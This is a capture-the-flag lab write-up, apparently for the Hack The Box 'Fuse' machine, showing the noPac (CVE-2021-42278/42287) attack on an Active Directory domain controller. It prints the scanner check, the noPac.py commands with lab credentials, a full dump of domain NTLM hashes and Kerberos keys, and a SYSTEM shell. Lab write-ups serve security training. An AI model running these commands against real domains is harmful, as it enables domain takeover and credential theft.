CVE-2021-42278/CVE-2021-42287
The target might be vulnerable to the CVE-2021-42278 +CVE-2021-42287 chain attack given the fact that target host is an older system and doesn’t seem to have the patched installed
exploit (nopac)
The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through faking a computer account with the trailing $ sign
By default, a standard user who is part of an Active Directory domain has the SeMachineAccountPrivilege policy enabled and can add up to 10 devices to the domain
Testing
It was initially revealed that the current user, svc-print, has SeMachineAccountPrivilege enabled.
But.. The reality is that every user has it enabled.
┌──(kali㉿kali)-[~/…/labs/fuse/SeMachineAccountPrivilege/noPac]
└─$ cme smb $IP -d FABRICORP.LOCAL --kdcHost fuse.fabricorp.local -u bnielson -p Qwer1233 -M nopac
smb 10.10.10.193 445 fuse [*] windows server 2016 standard 14393 x64 (name:FUSE) (domain:FABRICORP.LOCAL) (signing:True) (SMBv1:True)
smb 10.10.10.193 445 fuse [+] fabricorp.local\bnielson:Qwer1233
NOPAC 10.10.10.193 445 FUSE TGT with PAC size 1488
NOPAC 10.10.10.193 445 FUSE TGT without PAC size 731
NOPAC 10.10.10.193 445 FUSE
NOPAC 10.10.10.193 445 FUSE VULNEABLE
nopac 10.10.10.193 445 fuse next step: https://github.com/Ridter/noPacThe target system is confirmed to be vulnerable to the noPac exploit
Exploitation
┌──(kali㉿kali)-[~/…/labs/fuse/SeMachineAccountPrivilege/noPac]
└─$ python3 noPac.py 'fabricorp.local/svc-print:$fab@s3Rv1ce$1' -dc-ip $IP -use-ldap -dump -just-dc
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target fuse.fabricorp.local
[*] Total Domain Admins 2
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-NWDSEPB5H7M$"
[*] MachineAccount "WIN-NWDSEPB5H7M$" password = OBzD90Gr@LTn
[*] Successfully added machine account WIN-NWDSEPB5H7M$ with password OBzD90Gr@LTn.
[*] WIN-NWDSEPB5H7M$ object = CN=WIN-NWDSEPB5H7M,CN=Computers,DC=fabricorp,DC=local
[*] WIN-NWDSEPB5H7M$ sAMAccountName == fuse
[*] Saving a DC's ticket in fuse.ccache
[*] Reseting the machine account to WIN-NWDSEPB5H7M$
[*] Restored WIN-NWDSEPB5H7M$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_fuse.fabricorp.local.ccache
[*] Attempting to del a computer with the name: WIN-NWDSEPB5H7M$
[-] Delete computer WIN-NWDSEPB5H7M$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8ee7fac1bd38751dbff06b33616b87b0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc-print:1104:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bnielson:1105:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
sthompson:1601:aad3b435b51404eeaad3b435b51404ee:5fb3cc8b2f45791e200d740725fdf8fd:::
tlavel:1602:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
pmerton:1603:aad3b435b51404eeaad3b435b51404ee:e76e0270c2018153275aab1e143421b2:::
svc-scan:1605:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bhult:7101:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
dandrews:7102:aad3b435b51404eeaad3b435b51404ee:689583f00ad18c124c58405479b4c536:::
mberbatov:7601:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
astein:7602:aad3b435b51404eeaad3b435b51404ee:2f74c867a93cda5a255b1d8422192d80:::
dmuir:7603:aad3b435b51404eeaad3b435b51404ee:6320f0682f940651742a221d8218d161:::
FUSE$:1000:aad3b435b51404eeaad3b435b51404ee:ef512830838e8fcb017517c4ce3dbd97:::
WIN-QQORJ74HXTE$:10601:aad3b435b51404eeaad3b435b51404ee:d488a6ff29b28a99faa98ea31d1dd164:::
WIN-NWDSEPB5H7M$:10602:aad3b435b51404eeaad3b435b51404ee:9a746886a67b834b0bf47d5843bac22f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e6dcafd3738f9433358d59ef8015386a8c0a418a09b3e8968f8a00c6fa077984
Administrator:aes128-cts-hmac-sha1-96:83c4a7c2b6310e0b2323d7c67c9a8d68
Administrator:des-cbc-md5:0dfe83ce576d8aae
krbtgt:aes256-cts-hmac-sha1-96:5a844c905bc3ea680729e0044a00a817bb8e6b8a89c01b0d2f949e2d7ac9952e
krbtgt:aes128-cts-hmac-sha1-96:67f0c1ace3b5a9f43e90a00c1e5445c6
krbtgt:des-cbc-md5:49d93d43321f02b3
svc-print:aes256-cts-hmac-sha1-96:f06c128c73c7a4a2a6817ee22ce59979eac9789adf7043acbf11721f3b07b754
svc-print:aes128-cts-hmac-sha1-96:b662d12fedf3017aed71b2bf96ac6a99
svc-print:des-cbc-md5:fea11fdf6bd3105b
bnielson:aes256-cts-hmac-sha1-96:62aef12b7b5d68fe508b5904d2966a27f98ad83b5ca1fb9930bbcf420c2a16b6
bnielson:aes128-cts-hmac-sha1-96:70140834e3319d7511afa5c5b9ca4b32
bnielson:des-cbc-md5:9826c42010254a76
sthompson:aes256-cts-hmac-sha1-96:e93eb7d969f30a4acb55cff296599cc31f160cca523a63d3b0f9eba2787e63a5
sthompson:aes128-cts-hmac-sha1-96:a8f79b1eb4209a0b388d1bb99b94b0d9
sthompson:des-cbc-md5:4f9291c46291ba02
tlavel:aes256-cts-hmac-sha1-96:f415075d6b6566912c97a4e9a0249b2b209241c341534cb849b657711de11525
tlavel:aes128-cts-hmac-sha1-96:9ac52b65b9013838f129bc9a99826a4f
tlavel:des-cbc-md5:2a238576ab7a6213
pmerton:aes256-cts-hmac-sha1-96:102465f59909683f260981b1d93fa7d0f45778de11b636002082575456170db7
pmerton:aes128-cts-hmac-sha1-96:4dc80267b0b2ecc02e437aef76714710
pmerton:des-cbc-md5:ef3794940d6d0120
svc-scan:aes256-cts-hmac-sha1-96:053a97a7a728359be7aa5f83d3e81e81637ec74810841cc17acd1afc29850e5c
svc-scan:aes128-cts-hmac-sha1-96:1ae5f4fecd5b3bd67254d21f6adb6d56
svc-scan:des-cbc-md5:e30b208ccecd57ad
bhult:aes256-cts-hmac-sha1-96:f1097eb00e508bf95f4756a28f18f490c40ed3274b2fd67da8919647591e2c74
bhult:aes128-cts-hmac-sha1-96:b1f2affb4c9d4c70b301923cc5d89336
bhult:des-cbc-md5:4a1a209d4532a7b9
dandrews:aes256-cts-hmac-sha1-96:d2c7389d3185d2e68e47d227d817556349967cac1d5bfacb780aaddffeb34dce
dandrews:aes128-cts-hmac-sha1-96:497bd974ccfd3979edb0850dc65fa0a8
dandrews:des-cbc-md5:9ec2b53eae6b20f2
mberbatov:aes256-cts-hmac-sha1-96:11abccced1c06bfae96b0309c533812976b5b547d2090f1eaa590938afd1bc4a
mberbatov:aes128-cts-hmac-sha1-96:fc50f72a3f79c2abc43d820f849034da
mberbatov:des-cbc-md5:8023a16b9b3d5186
astein:aes256-cts-hmac-sha1-96:7f43bea8fd662b275434644b505505de055cdfa39aeb0e3794fec26afd077735
astein:aes128-cts-hmac-sha1-96:0d27194d0733cf16b5a19281de40ad8b
astein:des-cbc-md5:254f802902f8ec7a
dmuir:aes256-cts-hmac-sha1-96:67ffc8759725310ba34797753b516f57e0d3000dab644326aea69f1a9e8fedf0
dmuir:aes128-cts-hmac-sha1-96:692fde98f45bf520d494f50f213c6762
dmuir:des-cbc-md5:7fb515d59846498a
FUSE$:aes256-cts-hmac-sha1-96:a4e36245565e043b157986cb689f83ff347a2e66aa37949940229355d14c1341
FUSE$:aes128-cts-hmac-sha1-96:c4c7808e60de73f759ba75644933635d
FUSE$:des-cbc-md5:9b028f686123a21f
WIN-QQORJ74HXTE$:aes256-cts-hmac-sha1-96:aff53fbe21e11ea262cc42eddc253aa9c5e5fe5db2ef77772e1ddeac2c0d0330
WIN-QQORJ74HXTE$:aes128-cts-hmac-sha1-96:a3744ca333bb7c56360d8d23dcf2837a
WIN-QQORJ74HXTE$:des-cbc-md5:299e89ecf7673bae
WIN-NWDSEPB5H7M$:aes256-cts-hmac-sha1-96:c1735a355f300c970196d0da025ddb3a23e1d5563e339aa8c70e12ceb0c2a60f
WIN-NWDSEPB5H7M$:aes128-cts-hmac-sha1-96:5e613b277b8da60425b027e3823c3a78
WIN-NWDSEPB5H7M$:des-cbc-md5:fb1ac4a48fad10f1
[*] Cleaning up... Domain Level Compromise
Shelldrop
┌──(kali㉿kali)-[~/…/labs/fuse/SeMachineAccountPrivilege/noPac]
└─$ python3 nopac.py 'fabricorp.local/bnielson:Qwer1234' -dc-ip $IP -use-ldap -shell
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target fuse.fabricorp.local
[*] Total Domain Admins 2
[*] will try to impersonate sthompson
[*] Already have user sthompson ticket for target fuse.fabricorp.local
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
Fuse
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::bb
ipv6 address. . . . . . . . . . . : dead:beef::a503:3c1b:a607:49b2
link-local ipv6 address . . . . . : fe80::a503:3c1b:a607:49b2%5
ipv4 address. . . . . . . . . . . : 10.10.10.193
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%5
10.10.10.2
tunnel adapter isatap.{af2c7a34-a136-4854-894e-84f30da6c214}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : htbThis time, I used the credential of the bnielson user this time to prove that it can be done as long as there is a valid domain credential.
That is because every single domain user, by default, can add up to 10 machines, meaning that the ms-DS-MachineAccountQuota attribute is set to 10
GG